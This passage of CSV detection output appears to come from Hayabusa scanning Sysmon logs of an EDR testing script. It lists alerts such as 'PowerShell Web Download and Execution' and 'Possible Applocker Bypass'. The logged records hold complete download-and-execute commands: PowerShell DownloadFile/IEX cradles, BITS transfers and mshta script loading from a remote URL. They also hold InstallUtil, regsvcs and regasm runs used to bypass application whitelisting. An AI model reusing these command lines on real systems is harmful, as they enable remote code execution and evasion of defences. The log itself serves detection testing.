-c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.966 +00:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.966 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.966 +00:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via 
PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:04.008 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.202 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.202 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.318 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 
21:33:08.446 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.446 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.446 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:13.214 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 747F3D96-6619-5D3F-0000-0010FDE78600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:13.214 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:13.225 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.286 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.310 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 747F3D96-661E-5D3F-0000-00103F168700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.583 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: 
C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.583 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.583 +00:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.583 +00:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:20.186 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:20.711 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) 
| Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:20.711 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:21.567 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.215 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 
747F3D96-6623-5D3F-0000-001011F68700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.215 +00:00,MSEDGEWIN10,1,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.215 +00:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.215 +00:00,MSEDGEWIN10,1,medium,,PowerShell Web Download,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.232 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c 
""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,,PowerShell Web 
Download,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:24.104 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:24.563 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:25.202 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 
747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:25.202 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:28.250 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:28.250 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:28.374 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:28.374 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.341 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.341 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.565 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.565 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.646 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe 
AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.646 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:30.074 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.295 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.295 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.411 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.411 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.483 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.312 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 747F3D96-6633-5D3F-0000-001051608900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.312 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.358 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.358 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 